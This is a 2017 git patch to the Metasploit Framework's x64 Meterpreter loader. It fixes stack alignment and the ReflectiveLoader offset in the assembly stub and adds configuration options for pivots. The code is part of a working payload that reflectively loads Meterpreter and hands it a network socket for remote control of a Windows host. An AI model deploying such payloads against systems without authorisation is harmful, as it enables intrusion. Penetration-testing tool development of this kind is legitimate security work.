From 4ec87985a22ad80f29aaf1181aeafabe9a5c235c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 7 Aug 2017 20:01:57 +1000
Subject: [PATCH] Fix stager crash and support pivots in x64 meterp loader

---
 .../payload/windows/x64/meterpreter_loader.rb | 20 ++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb
index ba0de42a19..1489e9f4e5 100644
--- a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb
@@ -42,19 +42,20 @@ module Payload::Windows::MeterpreterLoader_x64
           push rbp              ; save rbp
           mov rbp, rsp          ; set up a new stack frame
           sub rsp, 32           ; allocate some space for calls.
+          and rsp, ~0xF         ; Ensure RSP is 16 byte aligned 
         ; GetPC
           call $+5              ; relative call to get location
           pop rbx               ; pop return value
         ; Invoke ReflectiveLoader()
           ; add the offset to ReflectiveLoader()
-          add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
+          add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
           call rbx              ; invoke ReflectiveLoader()
         ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
           ; offset from ReflectiveLoader() to the end of the DLL
           add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
     ^
 
-    unless opts[:stageless]
+    unless opts[:stageless] || opts[:force_write_handle] == true
       asm << %Q^
           ; store the comms socket or handle
           mov [rbx], rdi
@@ -79,13 +80,14 @@ module Payload::Windows::MeterpreterLoader_x64
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
-      arch:       opts[:uuid].arch,
-      exitfunk:   ds['EXITFUNC'],
-      expiration: ds['SessionExpirationTimeout'].to_i,
-      uuid:       opts[:uuid],
-      transports: opts[:transport_config] || [transport_config(opts)],
-      extensions: [],
-      stageless:  opts[:stageless] == true
+      arch:              opts[:uuid].arch,
+      null_session_guid: opts[:null_session_guid] == true,
+      exitfunk:          ds[:exit_func] || ds['EXITFUNC'],
+      expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
+      uuid:              opts[:uuid],
+      transports:        opts[:transport_config] || [transport_config(opts)],
+      extensions:        [],
+      stageless:         opts[:stageless] == true
     }
 
     # create the configuration instance based off the parameters